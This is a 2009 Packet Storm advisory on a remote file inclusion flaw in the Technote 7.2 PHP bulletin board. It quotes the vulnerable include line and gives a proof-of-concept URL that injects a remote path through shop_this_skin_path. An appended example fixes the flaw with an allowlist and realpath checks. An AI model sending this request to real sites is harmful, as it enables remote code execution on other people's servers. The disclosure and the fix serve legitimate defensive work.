Technote 7.2 Remote File Inclusion

2009-02-03T00:00:00
ID PACKETSTORM:74598
Type packetstorm
Reporter make0day
Modified 2009-02-03T00:00:00

Description

                                        
                                            `TECHNOTE 7.2 (08.09.25) Remote File Inclusion Vulnerability  
bY make0day@gmail.com  
  
/*************************  
  
TECHNOTE (VERSION 7.2 (08.09.25)) is a bulletin board system from Korea.  
It is freely available for all platforms that support PHP and MySQL.  
But I found a Remote File Inclusion vulnerability.  
Here are the details:  
  
**************************/  
TESTED ON VERSION TECHNOTE 7.2 (08.09.25)  
Download : http://www.technote.co.kr/  
/***************************  
Remote File Inclusion Vulnerability  
  
/body_default.php  
  
if($GOODS['gs_input']) include "$shop_this_skin_path/2_view_body/include/form_option.php";  
//File Include  
  
*************************/  
  
poc:  
  
http://[site]/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=[RFI]  
  
  
`
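
A hardened form of the include shown above, as an added example that is not Technote's own code or part of the original advisory: the skin directory comes from a server-side allowlist instead of the request-controllable `$shop_this_skin_path`, and the resolved file must sit under the skin root. The skin names, the `resolve_form_option()` helper and the temporary demo tree are assumptions made for illustration.

```php
<?php
// Added example (PHP 7.1+), not Technote code. Skin names and layout are assumed.

// Skins shipped with the application; the request never supplies a path.
const ALLOWED_SKINS = ['standard', 'simple'];

/**
 * Resolve form_option.php for an allowlisted skin.
 * Returns an absolute path under $skinRoot, or null when the value is refused.
 */
function resolve_form_option(string $skinRoot, string $skin): ?string
{
    // 1. Exact allowlisted names only, so a URL or any other
    //    request-supplied string is rejected before touching the filesystem.
    if (!in_array($skin, ALLOWED_SKINS, true)) {
        return null;
    }
    // 2. Canonicalise both paths and confirm the file is still inside the root
    //    (guards against symlinks or a misconfigured skin directory).
    $root = realpath($skinRoot);
    $file = realpath("$skinRoot/$skin/2_view_body/include/form_option.php");
    if ($root === false || $file === false) {
        return null;
    }
    if (strncmp($file, $root . DIRECTORY_SEPARATOR, strlen($root) + 1) !== 0) {
        return null;
    }
    return $file;
}

// Constructed demo: a throwaway skin tree with one valid template.
$root = sys_get_temp_dir() . '/skin_shop_demo_' . uniqid();
mkdir("$root/standard/2_view_body/include", 0700, true);
file_put_contents(
    "$root/standard/2_view_body/include/form_option.php",
    '<?php echo "form_option loaded\n";'
);

// Constructed inputs: one legitimate skin, one remote URL, one unknown name.
foreach (['standard', 'http://example.invalid/x', 'nonexistent'] as $skin) {
    $path = resolve_form_option($root, $skin);
    if ($path === null) {
        echo "refused: $skin\n";
        continue;
    }
    include $path; // built from an allowlisted constant, never from the request
}
```

Setting `allow_url_include = Off` in php.ini (the default since PHP 5.2) additionally stops `include` from fetching remote URLs.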